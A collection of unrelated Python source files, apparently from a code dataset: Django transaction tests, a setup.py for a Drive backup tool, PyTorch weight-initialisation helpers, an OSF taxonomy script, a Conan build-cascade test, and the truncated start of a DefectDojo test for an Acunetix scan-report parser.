class AtomicMergeTests(TransactionTestCase):
"""Test merging transactions with savepoint=False."""
available_apps = ['transactions']
def test_merged_outer_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Tournesol")
raise Exception("Oops, that's his last name")
# The third insert couldn't be roll back. Temporarily mark the
# connection as not needing rollback to check it.
self.assertTrue(transaction.get_rollback())
transaction.set_rollback(False)
self.assertEqual(Reporter.objects.count(), 3)
transaction.set_rollback(True)
# The second insert couldn't be roll back. Temporarily mark the
# connection as not needing rollback to check it.
self.assertTrue(transaction.get_rollback())
transaction.set_rollback(False)
self.assertEqual(Reporter.objects.count(), 3)
transaction.set_rollback(True)
# The first block has a savepoint and must roll back.
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_merged_inner_savepoint_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with transaction.atomic():
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Tournesol")
raise Exception("Oops, that's his last name")
# The third insert couldn't be roll back. Temporarily mark the
# connection as not needing rollback to check it.
self.assertTrue(transaction.get_rollback())
transaction.set_rollback(False)
self.assertEqual(Reporter.objects.count(), 3)
transaction.set_rollback(True)
# The second block has a savepoint and must roll back.
self.assertEqual(Reporter.objects.count(), 1)
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
@skipUnless(connection.features.uses_savepoints,
"'atomic' requires transactions and savepoints.")
class AtomicErrorsTests(TransactionTestCase):
available_apps = ['transactions']
def test_atomic_prevents_setting_autocommit(self):
autocommit = transaction.get_autocommit()
with transaction.atomic():
with self.assertRaises(transaction.TransactionManagementError):
transaction.set_autocommit(not autocommit)
# Make sure autocommit wasn't changed.
self.assertEqual(connection.autocommit, autocommit)
def test_atomic_prevents_calling_transaction_methods(self):
with transaction.atomic():
with self.assertRaises(transaction.TransactionManagementError):
transaction.commit()
with self.assertRaises(transaction.TransactionManagementError):
transaction.rollback()
def test_atomic_prevents_calling_transaction_management_methods(self):
with transaction.atomic():
with self.assertRaises(transaction.TransactionManagementError):
transaction.enter_transaction_management()
with self.assertRaises(transaction.TransactionManagementError):
transaction.leave_transaction_management()
def test_atomic_prevents_queries_in_broken_transaction(self):
r1 = Reporter.objects.create(first_name="Archibald", last_name="Haddock")
with transaction.atomic():
r2 = Reporter(first_name="Cuthbert", last_name="Calculus", id=r1.id)
with self.assertRaises(IntegrityError):
r2.save(force_insert=True)
# The transaction is marked as needing rollback.
with self.assertRaises(transaction.TransactionManagementError):
r2.save(force_update=True)
self.assertEqual(Reporter.objects.get(pk=r1.pk).last_name, "Haddock")
@skipIfDBFeature('atomic_transactions')
def test_atomic_allows_queries_after_fixing_transaction(self):
r1 = Reporter.objects.create(first_name="Archibald", last_name="Haddock")
with transaction.atomic():
r2 = Reporter(first_name="Cuthbert", last_name="Calculus", id=r1.id)
with self.assertRaises(IntegrityError):
r2.save(force_insert=True)
# Mark the transaction as no longer needing rollback.
transaction.set_rollback(False)
r2.save(force_update=True)
self.assertEqual(Reporter.objects.get(pk=r1.pk).last_name, "Calculus")
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_atomic_prevents_queries_in_broken_transaction_after_client_close(self):
with transaction.atomic():
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
connection.close()
# The connection is closed and the transaction is marked as
# needing rollback. This will raise an InterfaceError on databases
# that refuse to create cursors on closed connections (PostgreSQL)
# and a TransactionManagementError on other databases.
with self.assertRaises(Error):
Reporter.objects.create(first_name="Cuthbert", last_name="Calculus")
# The connection is usable again .
self.assertEqual(Reporter.objects.count(), 0)
@skipUnless(connection.vendor == 'mysql', "MySQL-specific behaviors")
class AtomicMySQLTests(TransactionTestCase):
available_apps = ['transactions']
@skipIf(threading is None, "Test requires threading")
def test_implicit_savepoint_rollback(self):
"""MySQL implicitly rolls back savepoints when it deadlocks (#22291)."""
other_thread_ready = threading.Event()
def other_thread():
try:
with transaction.atomic():
Reporter.objects.create(id=1, first_name="Tintin")
other_thread_ready.set()
# We cannot synchronize the two threads with an event here
# because the main thread locks. Sleep for a little while.
time.sleep(1)
# 2) ... and this line deadlocks. (see below for 1)
Reporter.objects.exclude(id=1).update(id=2)
finally:
# This is the thread-local connection, not the main connection.
connection.close()
other_thread = threading.Thread(target=other_thread)
other_thread.start()
other_thread_ready.wait()
with six.assertRaisesRegex(self, OperationalError, 'Deadlock found'):
# Double atomic to enter a transaction and create a savepoint.
with transaction.atomic():
with transaction.atomic():
# 1) This line locks... (see above for 2)
Reporter.objects.create(id=1, first_name="Tintin")
other_thread.join()
class AtomicMiscTests(TransactionTestCase):
available_apps = []
def test_wrap_callable_instance(self):
# Regression test for #20028
class Callable(object):
def __call__(self):
pass
# Must not raise an exception
transaction.atomic(Callable())
class TransactionTests(IgnorePendingDeprecationWarningsMixin, TransactionTestCase):
available_apps = ['transactions']
def create_a_reporter_then_fail(self, first, last):
a = Reporter(first_name=first, last_name=last)
a.save()
raise Exception("I meant to do that")
def remove_a_reporter(self, first_name):
r = Reporter.objects.get(first_name="Alice")
r.delete()
def manually_managed(self):
r = Reporter(first_name="Dirk", last_name="Gently")
r.save()
transaction.commit()
def manually_managed_mistake(self):
r = Reporter(first_name="Edward", last_name="Woodward")
r.save()
# Oops, I forgot to commit/rollback!
@skipUnlessDBFeature('supports_transactions')
def test_autocommit(self):
"""
The default behavior is to autocommit after each save() action.
"""
self.assertRaises(Exception,
self.create_a_reporter_then_fail,
"Alice", "Smith"
)
# The object created before the exception still exists
self.assertEqual(Reporter.objects.count(), 1)
@skipUnlessDBFeature('supports_transactions')
def test_autocommit_decorator(self):
"""
The autocommit decorator works exactly the same as the default behavior.
"""
autocomitted_create_then_fail = transaction.autocommit(
self.create_a_reporter_then_fail
)
self.assertRaises(Exception,
autocomitted_create_then_fail,
"Alice", "Smith"
)
# Again, the object created before the exception still exists
self.assertEqual(Reporter.objects.count(), 1)
@skipUnlessDBFeature('supports_transactions')
def test_autocommit_decorator_with_using(self):
"""
The autocommit decorator also works with a using argument.
"""
autocomitted_create_then_fail = transaction.autocommit(using='default')(
self.create_a_reporter_then_fail
)
self.assertRaises(Exception,
autocomitted_create_then_fail,
"Alice", "Smith"
)
# Again, the object created before the exception still exists
self.assertEqual(Reporter.objects.count(), 1)
@skipUnlessDBFeature('supports_transactions')
def test_commit_on_success(self):
"""
With the commit_on_success decorator, the transaction is only committed
if the function doesn't throw an exception.
"""
committed_on_success = transaction.commit_on_success(
self.create_a_reporter_then_fail)
self.assertRaises(Exception, committed_on_success, "Dirk", "Gently")
# This time the object never got saved
self.assertEqual(Reporter.objects.count(), 0)
@skipUnlessDBFeature('supports_transactions')
def test_commit_on_success_with_using(self):
"""
The commit_on_success decorator also works with a using argument.
"""
using_committed_on_success = transaction.commit_on_success(using='default')(
self.create_a_reporter_then_fail
)
self.assertRaises(Exception,
using_committed_on_success,
"Dirk", "Gently"
)
# This time the object never got saved
self.assertEqual(Reporter.objects.count(), 0)
@skipUnlessDBFeature('supports_transactions')
def test_commit_on_success_succeed(self):
"""
If there aren't any exceptions, the data will get saved.
"""
Reporter.objects.create(first_name="Alice", last_name="Smith")
remove_comitted_on_success = transaction.commit_on_success(
self.remove_a_reporter
)
remove_comitted_on_success("Alice")
self.assertEqual(list(Reporter.objects.all()), [])
@skipUnlessDBFeature('supports_transactions')
def test_commit_on_success_exit(self):
@transaction.autocommit()
def gen_reporter():
@transaction.commit_on_success
def create_reporter():
Reporter.objects.create(first_name="Bobby", last_name="Tables")
create_reporter()
# Much more formal
r = Reporter.objects.get()
r.first_name = "Robert"
r.save()
gen_reporter()
r = Reporter.objects.get()
self.assertEqual(r.first_name, "Robert")
@skipUnlessDBFeature('supports_transactions')
def test_manually_managed(self):
"""
You can manually manage transactions if you really want to, but you
have to remember to commit/rollback.
"""
manually_managed = transaction.commit_manually(self.manually_managed)
manually_managed()
self.assertEqual(Reporter.objects.count(), 1)
@skipUnlessDBFeature('supports_transactions')
def test_manually_managed_mistake(self):
"""
If you forget, you'll get bad errors.
"""
manually_managed_mistake = transaction.commit_manually(
self.manually_managed_mistake
)
self.assertRaises(transaction.TransactionManagementError,
manually_managed_mistake)
@skipUnlessDBFeature('supports_transactions')
def test_manually_managed_with_using(self):
"""
The commit_manually function also works with a using argument.
"""
using_manually_managed_mistake = transaction.commit_manually(using='default')(
self.manually_managed_mistake
)
self.assertRaises(transaction.TransactionManagementError,
using_manually_managed_mistake
)
class TransactionRollbackTests(IgnorePendingDeprecationWarningsMixin, TransactionTestCase):
available_apps = ['transactions']
def execute_bad_sql(self):
cursor = connection.cursor()
cursor.execute("INSERT INTO transactions_reporter (first_name, last_name) VALUES ('Douglas', 'Adams');")
@skipUnlessDBFeature('requires_rollback_on_dirty_transaction')
def test_bad_sql(self):
"""
Regression for #11900: If a function wrapped by commit_on_success
writes a transaction that can't be committed, that transaction should
be rolled back. The bug is only visible using the psycopg2 backend,
though the fix is generally a good idea.
"""
execute_bad_sql = transaction.commit_on_success(self.execute_bad_sql)
self.assertRaises(IntegrityError, execute_bad_sql)
transaction.rollback()
class TransactionContextManagerTests(IgnorePendingDeprecationWarningsMixin, TransactionTestCase):
available_apps = ['transactions']
def create_reporter_and_fail(self):
Reporter.objects.create(first_name="Bob", last_name="Holtzman")
raise Exception
@skipUnlessDBFeature('supports_transactions')
def test_autocommit(self):
"""
The default behavior is to autocommit after each save() action.
"""
with self.assertRaises(Exception):
self.create_reporter_and_fail()
# The object created before the exception still exists
self.assertEqual(Reporter.objects.count(), 1)
@skipUnlessDBFeature('supports_transactions')
def test_autocommit_context_manager(self):
"""
The autocommit context manager works exactly the same as the default
behavior.
"""
with self.assertRaises(Exception):
with transaction.autocommit():
self.create_reporter_and_fail()
self.assertEqual(Reporter.objects.count(), 1)
@skipUnlessDBFeature('supports_transactions')
def test_autocommit_context_manager_with_using(self):
"""
The autocommit context manager also works with a using argument.
"""
with self.assertRaises(Exception):
with transaction.autocommit(using="default"):
self.create_reporter_and_fail()
self.assertEqual(Reporter.objects.count(), 1)
@skipUnlessDBFeature('supports_transactions')
def test_commit_on_success(self):
"""
With the commit_on_success context manager, the transaction is only
committed if the block doesn't throw an exception.
"""
with self.assertRaises(Exception):
with transaction.commit_on_success():
self.create_reporter_and_fail()
self.assertEqual(Reporter.objects.count(), 0)
@skipUnlessDBFeature('supports_transactions')
def test_commit_on_success_with_using(self):
"""
The commit_on_success context manager also works with a using argument.
"""
with self.assertRaises(Exception):
with transaction.commit_on_success(using="default"):
self.create_reporter_and_fail()
self.assertEqual(Reporter.objects.count(), 0)
@skipUnlessDBFeature('supports_transactions')
def test_commit_on_success_succeed(self):
"""
If there aren't any exceptions, the data will get saved.
"""
Reporter.objects.create(first_name="Alice", last_name="Smith")
with transaction.commit_on_success():
Reporter.objects.filter(first_name="Alice").delete()
self.assertQuerysetEqual(Reporter.objects.all(), [])
@skipUnlessDBFeature('supports_transactions')
def test_commit_on_success_exit(self):
with transaction.autocommit():
with transaction.commit_on_success():
Reporter.objects.create(first_name="Bobby", last_name="Tables")
# Much more formal
r = Reporter.objects.get()
r.first_name = "Robert"
r.save()
r = Reporter.objects.get()
self.assertEqual(r.first_name, "Robert")
@skipUnlessDBFeature('supports_transactions')
def test_manually_managed(self):
"""
You can manually manage transactions if you really want to, but you
have to remember to commit/rollback.
"""
with transaction.commit_manually():
Reporter.objects.create(first_name="Libby", last_name="Holtzman")
transaction.commit()
self.assertEqual(Reporter.objects.count(), 1)
@skipUnlessDBFeature('supports_transactions')
def test_manually_managed_mistake(self):
"""
If you forget, you'll get bad errors.
"""
with self.assertRaises(transaction.TransactionManagementError):
with transaction.commit_manually():
Reporter.objects.create(first_name="Scott", last_name="Browning")
@skipUnlessDBFeature('supports_transactions')
def test_manually_managed_with_using(self):
"""
The commit_manually function also works with a using argument.
"""
with self.assertRaises(transaction.TransactionManagementError):
with transaction.commit_manually(using="default"):
Reporter.objects.create(first_name="Walter", last_name="Cronkite")
@skipUnlessDBFeature('requires_rollback_on_dirty_transaction')
def test_bad_sql(self):
"""
Regression for #11900: If a block wrapped by commit_on_success
writes a transaction that can't be committed, that transaction should
be rolled back. The bug is only visible using the psycopg2 backend,
though the fix is generally a good idea.
"""
with self.assertRaises(IntegrityError):
with transaction.commit_on_success():
cursor = connection.cursor()
cursor.execute("INSERT INTO transactions_reporter (first_name, last_name) VALUES ('Douglas', 'Adams');")
transaction.rollback()
|
68249
|
try:
from setuptools import setup, find_packages
except ImportError:
print 'Please download and install setuptools (http://pypi.python.org/pypi/setuptools)'
exit(1)
setup(
name = "Brive",
version = "0.4.0",
packages = find_packages(),
author = "<NAME>",
author_email = "<EMAIL>",
description = "Brive, the Google Apps Domains' Drive Backup application",
license = "UNLICENSED (cf http://unlicense.org/)",
keywords = "google drive backup domain",
url = "https://github.com/x8wk/Brive",
install_requires = [
'Brive==0.3.11',
'cffi==1.2.1',
'cryptography==1.0.1',
'enum34==1.0.4',
'feedparser==5.2.1',
'google-api-python-client==1.4.2',
'httplib2==0.9.1',
'idna==2.0',
'ipaddress==1.0.14',
'oauth2client==1.5.1',
'pyasn1==0.1.8',
'pyasn1-modules==0.0.7',
'pycparser==2.14',
'pyOpenSSL==0.15.1',
'python-dateutil==2.4.2',
'PyYAML==3.11',
'rsa==3.2',
'simplejson==3.8.0',
'six==1.9.0',
'streaming-httplib2==0.7.6',
'uritemplate==0.6',
'wheel==0.26.0'
],
dependency_links = [
"http://pyyaml.org/download/pyyaml/PyYAML-3.11.tar.gz"
]
)
# for some reason, the developer of streaming_httplib2 didn't include the certificates
# of signing authorities for SSL, so here we copy the certs from httplib2
# ugly, but eh...
import os, sys, httplib2, streaming_httplib2, shutil
httplib2_root = os.path.dirname(httplib2.__file__)
streaming_httplib2_root = os.path.dirname(streaming_httplib2.__file__)
cacerts_file_path = os.path.join(httplib2_root, 'cacerts.txt')
shutil.copy(cacerts_file_path, streaming_httplib2_root)
|
68261
|
import torch.nn as nn
import math
import torch
def init_model(model, **kwargs):
conv_type = kwargs.get("conv_type", None)
if conv_type == "def":
conv_type = None
bias_type = kwargs.get("bias_type", None)
if bias_type == "def":
bias_type = None
mode = kwargs.get("mode", None)
nonlinearity = kwargs.get("nonlinearity", None)
bn_init = kwargs.get("bn_init", None)
if bn_init == "def":
bn_init = None
init_linear = kwargs.get("init_linear", False)
logger = kwargs.get("logger", None)
assert (logger is not None)
assert (conv_type in {"he", "xavier", None})
assert (mode in {"fan_out", "fan_in", None})
assert (nonlinearity in {"relu", None})
assert (bn_init in {"01", "11", "uniformweight", None})
if conv_type is not None:
if conv_type == "he":
init_conv_he(model, mode, nonlinearity, logger)
if conv_type == "xavier":
init_conv_xavier(model, mode, nonlinearity, logger)
init_lin_xavier(model, logger)
if bias_type is not None:
if bias_type == "xavier":
init_bias_xavier(model, mode, nonlinearity, logger)
init_bias_lin_xavier(model, logger)
if str(bias_type) == "0":
init_bias_zero(model, mode, nonlinearity, logger)
init_bias_lin_zero(model, logger)
if bn_init is not None:
if bn_init == "01":
init_bn_01(model, logger=logger)
elif bn_init == "11":
init_bn_11(model, logger=logger)
elif bn_init == "uniformweight":
init_bn_uniformweight(model, logger=logger)
if init_linear:
init_lin(model, logger)
def init_conv_xavier(model, mode='fan_out', nonlinearity='relu', logger=None):
layers_initialized = 0
a = 0
for m in model.modules():
if isinstance(m, nn.Conv2d):
layers_initialized += 1
torch.nn.init.xavier_normal_(m.weight.data)
if m.bias is not None:
m.bias.data.normal_(0, math.sqrt(2)/math.sqrt(1+9*m.bias.data.shape[0]))
logger.info("Initialized " + str(layers_initialized) + " Conv2d layers using nn.init.xavier_normal_")
def init_bias_xavier(model, mode='fan_out', nonlinearity='relu', logger=None):
layers_initialized = 0
a = 0
for m in model.modules():
if isinstance(m, nn.Conv2d):
if m.bias is not None:
layers_initialized += 1
m.bias.data.normal_(0, math.sqrt(2)/math.sqrt(1+9*m.bias.data.shape[0]))
logger.info("Initialized " + str(layers_initialized) + \
" bias conv2d layers using nn.init.xavier.noraml_")
def init_lin_xavier(model, logger=None):
layers_initialized = 0
a = 0
for m in model.modules():
if isinstance(m, nn.Linear):
layers_initialized += 1
torch.nn.init.xavier_normal_(m.weight.data)
logger.info("Initialized " + str(layers_initialized) + " linear layers using xavier")
def init_bias_lin_xavier(model, logger=None):
layers_initialized = 0
a = 0
for m in model.modules():
if isinstance(m, nn.Linear):
if m.bias is not None:
layers_initialized += 1
m.bias.data.normal_(0, math.sqrt(2)/math.sqrt(1+m.bias.data.shape[0]))
logger.info("Initialized " + str(layers_initialized) + " bias linear layers using xavier")
def init_bias_lin_zero(model, logger=None):
layers_initialized = 0
a = 0
for m in model.modules():
if isinstance(m, nn.Linear):
if m.bias is not None:
layers_initialized += 1
m.bias.data.zero_()
logger.info("Initialized " + str(layers_initialized) + " bias linear layers using 0")
def init_bias_zero(model, mode='fan_out', nonlinearity='relu', logger=None):
layers_initialized = 0
a = 0
for m in model.modules():
if isinstance(m, nn.Conv2d):
if m.bias is not None:
layers_initialized += 1
m.bias.data.zero_()
logger.info("Initialized " + str(layers_initialized) + \
" bias conv2d layers using nn.init.zero")
def init_conv_he(model, mode='fan_out', nonlinearity='relu', logger=None):
layers_initialized = 0
a = 0
for m in model.modules():
if isinstance(m, nn.Conv2d):
layers_initialized += 1
nn.init.kaiming_normal(m.weight.data, a=a, mode=mode)
logger.info("Initialized " + str(layers_initialized) + \
" conv2d layers using nn.init.kaiming_normal_")
def init_lin(model, logger=None):
layers_initialized = 0
a = 0
for m in model.modules():
if isinstance(m, nn.Linear):
layers_initialized += 1
stdv = 1. / math.sqrt(m.weight.data.size(1))
std_cur = stdv
m.weight.data.fill_(std_cur)
m.bias.data.fill_(std_cur)
logger.info("Initialized " + str(layers_initialized) + " linear layers using PyTorch default")
def init_bn_01(model, logger=None):
layers_initialized = 0
for m in model.modules():
if isinstance(m, nn.BatchNorm2d):
layers_initialized += 1
m.weight.data.fill_(1)
m.bias.data.zero_()
logger.info("Initialized " + str(layers_initialized) + " BN layers using weight=1 and bias=0")
def init_bn_11(model, logger=None):
layers_initialized = 0
for m in model.modules():
if isinstance(m, nn.BatchNorm2d):
layers_initialized += 1
m.weight.data.fill_(0.015)
m.bias.data.fill_(0.015)
logger.info("Initialized " + str(layers_initialized) + " BN layers using weight=0.015 and bias=0.015")
def init_bn_uniformweight(model, logger=None):
layers_initialized = 0
for m in model.modules():
if isinstance(m, nn.BatchNorm2d):
layers_initialized += 1
m.weight.data.uniform_()
m.bias.data.zero_()
logger.info("Initialized " + str(layers_initialized) + " BN layers using weight=U(0,1) and bias=0")
###############
def _calculate_correct_fan(tensor, mode):
mode = mode.lower()
valid_modes = ['fan_in', 'fan_out']
if mode not in valid_modes:
raise ValueError("Mode {} not supported, please use one of {}".format(mode, valid_modes))
fan_in, fan_out = _calculate_fan_in_and_fan_out(tensor)
return fan_in if mode == 'fan_in' else fan_out
def _calculate_fan_in_and_fan_out(tensor):
dimensions = tensor.ndimension()
if dimensions < 2:
raise ValueError("Fan in and fan out can not be computed for tensor with less than 2 dimensions")
if dimensions == 2: # Linear
fan_in = tensor.size(1)
fan_out = tensor.size(0)
else:
num_input_fmaps = tensor.size(1)
num_output_fmaps = tensor.size(0)
receptive_field_size = 1
if tensor.dim() > 2:
receptive_field_size = tensor[0][0].numel()
fan_in = num_input_fmaps * receptive_field_size
fan_out = num_output_fmaps * receptive_field_size
return fan_in, fan_out
def calculate_gain(nonlinearity, param=None):
r"""Return the recommended gain value for the given nonlinearity function.
The values are as follows:
================= ====================================================
nonlinearity gain
================= ====================================================
Linear / Identity :math:`1`
Conv{1,2,3}D :math:`1`
Sigmoid :math:`1`
Tanh :math:`\frac{5}{3}`
ReLU :math:`\sqrt{2}`
Leaky Relu :math:`\sqrt{\frac{2}{1 + \text{negative_slope}^2}}`
================= ====================================================
Args:
nonlinearity: the non-linear function (`nn.functional` name)
param: optional parameter for the non-linear function
Examples:
>>> gain = nn.init.calculate_gain('leaky_relu')
"""
linear_fns = ['linear', 'conv1d', 'conv2d', 'conv3d', 'conv_transpose1d', 'conv_transpose2d', 'conv_transpose3d']
if nonlinearity in linear_fns or nonlinearity == 'sigmoid':
return 1
elif nonlinearity == 'tanh':
return 5.0 / 3
elif nonlinearity == 'relu':
return math.sqrt(2.0)
elif nonlinearity == 'leaky_relu':
if param is None:
negative_slope = 0.01
elif not isinstance(param, bool) and isinstance(param, int) or isinstance(param, float):
# True/False are instances of int, hence check above
negative_slope = param
else:
raise ValueError("negative_slope {} not a valid number".format(param))
return math.sqrt(2.0 / (1 + negative_slope ** 2))
else:
raise ValueError("Unsupported nonlinearity {}".format(nonlinearity))
def kaiming_normal_std_(tensor, a=0, mode='fan_in', nonlinearity='leaky_relu'):
r"""Fills the input `Tensor` with values according to the method
described in "Delving deep into rectifiers: Surpassing human-level
performance on ImageNet classification" - <NAME>. et al. (2015), using a
normal distribution. The resulting tensor will have values sampled from
:math:`\mathcal{N}(0, \text{std})` where
.. math::
\text{std} = \sqrt{\frac{2}{(1 + a^2) \times \text{fan_in}}}
Also known as He initialization.
Args:
tensor: an n-dimensional `torch.Tensor`
a: the negative slope of the rectifier used after this layer (0 for ReLU
by default)
mode: either 'fan_in' (default) or 'fan_out'. Choosing `fan_in`
preserves the magnitude of the variance of the weights in the
forward pass. Choosing `fan_out` preserves the magnitudes in the
backwards pass.
nonlinearity: the non-linear function (`nn.functional` name),
recommended to use only with 'relu' or 'leaky_relu' (default).
Examples:
>>> w = torch.empty(3, 5)
>>> nn.init.kaiming_normal_(w, mode='fan_out', nonlinearity='relu')
"""
fan = _calculate_correct_fan(tensor, mode)
gain = calculate_gain(nonlinearity, a)
std = gain / math.sqrt(fan)
return std
|
68276
|
import wx.lib.agw.floatspin as floatspin
from .wxControl import *
class 图片操作(wx.Image, 公用方法):
pass
def 设置宽度高度(self, width, height, quality=0):
return 图片操作(self.Scale(width, height, quality))
def 取位图(self, depth=-1):
return self.ConvertToBitmap(depth)
|
68321
|
import os
import json
import logging
import sys
from django.db import transaction
from django.apps import apps
from scripts import utils as script_utils
from scripts.populate_preprint_providers import update_or_create
from website.app import init_app
from website import settings
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
# OSF preprint provider used for initial subject creation
OSF_PROVIDER_DATA = {
'_id': 'osf',
'name': 'Open Science Framework',
'domain': settings.DOMAIN,
'domain_redirect_enabled': False,
'default_license': 'CC0 1.0 Universal',
'licenses_acceptable': ['CC0 1.0 Universal', 'CC-By Attribution 4.0 International', 'No license'],
}
def update_taxonomies(filename):
Subject = apps.get_model('osf.Subject')
PreprintProvider = apps.get_model('osf.PreprintProvider')
try:
bepress_provider = PreprintProvider.objects.get(_id='osf')
except PreprintProvider.DoesNotExist:
bepress_provider, _ = update_or_create(OSF_PROVIDER_DATA)
# Flat taxonomy is stored locally, read in here
with open(
os.path.join(
settings.APP_PATH,
'website', 'static', filename
)
) as fp:
taxonomy = json.load(fp)
for subject_path in taxonomy.get('data'):
subjects = subject_path.split('_')
text = subjects[-1]
# Search for parent subject, get id if it exists
parent = None
if len(subjects) > 1:
parent, created_p = Subject.objects.get_or_create(text=subjects[-2], provider=bepress_provider)
if created_p:
logger.info('Created parent "{}":{} for subject {}'.format(parent.text, parent._id, text))
logger.info(u'Getting or creating Subject "{}"{}'.format(
text,
u' with parent {}:{}'.format(parent.text, parent._id) if parent else ''
))
subject, _ = Subject.objects.get_or_create(text=text, provider=bepress_provider)
if parent and not subject.parent:
logger.info(u'Adding parent "{}":{} to Subject "{}":{}'.format(
parent.text, parent._id,
subject.text, subject._id
))
subject.parent = parent
subject.save()
def main():
init_app(set_backends=True, routes=False)
dry_run = '--dry' in sys.argv
if not dry_run:
script_utils.add_file_logger(logger, __file__)
with transaction.atomic():
update_taxonomies('bepress_taxonomy.json')
if dry_run:
raise RuntimeError('Dry run, transaction rolled back')
if __name__ == '__main__':
main()
|
68359
|
import unittest
from collections import OrderedDict
from conans.model.ref import ConanFileReference
from conans.test.utils.tools import TestServer, TurboTestClient, GenConanfile
class InstallCascadeTest(unittest.TestCase):
def setUp(self):
"""
A
/ \
B C
| \
D |
/ \ |
| \ /
E F
"""
server = TestServer()
servers = OrderedDict([("default", server)])
self.client = TurboTestClient(servers=servers)
self.ref_a = ConanFileReference.loads("libA/1.0@conan/stable")
self.client.create(self.ref_a, conanfile=GenConanfile())
self.ref_b = ConanFileReference.loads("libB/1.0@conan/stable")
self.client.create(self.ref_b, conanfile=GenConanfile().with_requirement(self.ref_a))
self.ref_c = ConanFileReference.loads("libC/1.0@conan/stable")
self.client.create(self.ref_c, conanfile=GenConanfile().with_requirement(self.ref_a))
self.ref_d = ConanFileReference.loads("libD/1.0@conan/stable")
self.client.create(self.ref_d, conanfile=GenConanfile().with_requirement(self.ref_b))
self.ref_e = ConanFileReference.loads("libE/1.0@conan/stable")
self.client.create(self.ref_e, conanfile=GenConanfile().with_requirement(self.ref_d))
self.ref_f = ConanFileReference.loads("libF/1.0@conan/stable")
conanfile = GenConanfile().with_requirement(self.ref_c).with_requirement(self.ref_d)
self.client.create(self.ref_f, conanfile=conanfile)
def _assert_built(self, refs):
for ref in refs:
self.assertIn("{}: Copying sources to build folder".format(ref), self.client.out)
for ref in [self.ref_a, self.ref_b, self.ref_c, self.ref_d, self.ref_e, self.ref_f]:
if ref not in refs:
self.assertNotIn("{}: Copying sources to build folder".format(ref),
self.client.out)
def test_install_cascade_only_affected(self):
project = ConanFileReference.loads("project/1.0@conan/stable")
project_cf = GenConanfile().with_requirement(self.ref_e).with_requirement(self.ref_f)
# Building A everything is built
self.client.create(project, conanfile=project_cf,
args="--build {} --build cascade".format(self.ref_a))
self._assert_built([self.ref_a, self.ref_b, self.ref_c, self.ref_d,
self.ref_e, self.ref_f, project])
# Building D builds E, F and project
self.client.create(project, conanfile=project_cf,
args="--build {} --build cascade".format(self.ref_d))
self._assert_built([self.ref_d, self.ref_e, self.ref_f, project])
# Building E only builds E and project
self.client.create(project, conanfile=project_cf,
args="--build {} --build cascade".format(self.ref_e))
self._assert_built([self.ref_e, project])
# Building project only builds project
self.client.create(project, conanfile=project_cf,
args="--build {} --build cascade".format(project))
self._assert_built([project])
# Building C => builds F and project
self.client.create(project, conanfile=project_cf,
args="--build {} --build cascade".format(self.ref_c))
self._assert_built([project, self.ref_f, self.ref_c])
|
68495
|
import datetime
from ..dojo_test_case import DojoTestCase
from dojo.models import Test
from dojo.tools.acunetix.parser import AcunetixParser
class TestAcunetixParser(DojoTestCase):
def test_parse_file_with_one_finding(self):
testfile = open("unittests/scans/acunetix/one_finding.xml")
parser = AcunetixParser()
findings = parser.get_findings(testfile, Test())
for finding in findings:
for endpoint in finding.unsaved_endpoints:
endpoint.clean()
self.assertEqual(1, len(findings))
with self.subTest(i=0):
finding = findings[0]
self.assertEqual("Medium", finding.severity)
self.assertEqual(352, finding.cwe)
self.assertEqual(datetime.date(2018, 9, 24), finding.date)
self.assertIsNotNone(finding.description)
self.assertGreater(len(finding.description), 0)
self.assertFalse(finding.false_p)
self.assertEqual("Vijay Test Imapact", finding.impact)
self.assertIsNotNone(finding.references)
self.assertGreater(len(finding.references), 0)
self.assertEqual(1, len(finding.unsaved_endpoints))
# check endpoints
self.assertEqual(1, len(finding.unsaved_endpoints))
endpoint = finding.unsaved_endpoints[0]
self.assertEqual('https', endpoint.protocol)
self.assertEqual(443, endpoint.port)
self.assertEqual('vijaytest.com', endpoint.host)
self.assertEqual('some/path', endpoint.path)
def test_parse_file_with_multiple_finding(self):
testfile = open("unittests/scans/acunetix/many_findings.xml")
parser = AcunetixParser()
findings = parser.get_findings(testfile, Test())
for finding in findings:
for endpoint in finding.unsaved_endpoints:
endpoint.clean()
self.assertEqual(4, len(findings))
with self.subTest(i=0):
finding = findings[0]
self.assertEqual("Medium", finding.severity)
self.assertEqual(datetime.date(2020, 2, 27), finding.date)
self.assertIsNotNone(finding.description)
self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", finding.cvssv3)
self.assertFalse(finding.false_p)
self.assertEqual("A single machine can take down another machine's web server with minimal bandwidth and side effects on unrelated services and ports.", finding.impact)
# check that this finding have references
self.assertIsNotNone(finding.references)
self.assertGreater(len(finding.references), 0)
# check endpoints
self.assertEqual(1, len(finding.unsaved_endpoints))
endpoint = finding.unsaved_endpoints[0]
self.assertIsNone(endpoint.protocol)
self.assertIsNone(endpoint.port)
self.assertEqual('www.itsecgames.com', endpoint.host)
self.assertIsNone(endpoint.path)
# check req/resp
self.assertEqual(1, len(finding.unsaved_req_resp))
req_resp = finding.unsaved_req_resp[0]
self.assertIn('req', req_resp)
self.assertIsNotNone(req_resp['req'])
self.assertIsInstance(req_resp['req'], str)
self.assertIn('resp', req_resp)
self.assertIsNotNone(req_resp['resp'])
self.assertIsInstance(req_resp['resp'], str)
with self.subTest(i=1):
finding = findings[1]
self.assertEqual("Possible virtual host found", finding.title)
self.assertEqual("Low", finding.severity)
self.assertEqual(200, finding.cwe)
self.assertEqual(datetime.date(2020, 2, 27), finding.date)
self.assertIsNotNone(finding.description)
self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", finding.cvssv3)
self.assertFalse(finding.false_p)
self.assertEqual("Possible sensitive information disclosure.", finding.impact)
# check that this finding have references
